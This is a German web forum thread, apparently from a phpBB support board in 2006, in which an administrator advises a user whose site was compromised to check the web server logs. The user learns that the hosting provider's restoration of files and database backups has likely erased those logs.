Du musst in die Webserver-Logs schauen. Dort ist genau festgehalten, was wer macht.
Aber auch nur, solange er den Webserver selber verwendet hat.
Ist er über PHP oder einen anderen Dienst eingebrochen, wird es deutlich schwerer, die Lücke zu finden.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Ok, dann kann ich das nicht mehr nachvollziehen!

all-ink hat die Daten alle auf dem FTP ausgetauscht!
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Auf dem FTP nur?
Dann wären die Logs auch weg...
Und somit keine Chance mehr, nachzuschauen, wo die Lücke gewesen sein könnte...
Zuletzt geändert von oxpus am Fr 13.Okt, 2006 09:53, insgesamt 1-mal geändert.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Werd ich mir merken!!!!! Hab es mir gleich hinter Ohren geschrieben!

Wusste ich nicht!


Die Daten auf dem FTP hatte die ausgetauscht und die Backups von den Datenbanken hatten sie mir auf den FTP geladen gehabt!
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Das normale Vorgehen.
Nun ja, hoffen wir, daß Du von einem solchen Unfall zukünftig verschont bleibst *daumendrück*
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Antworten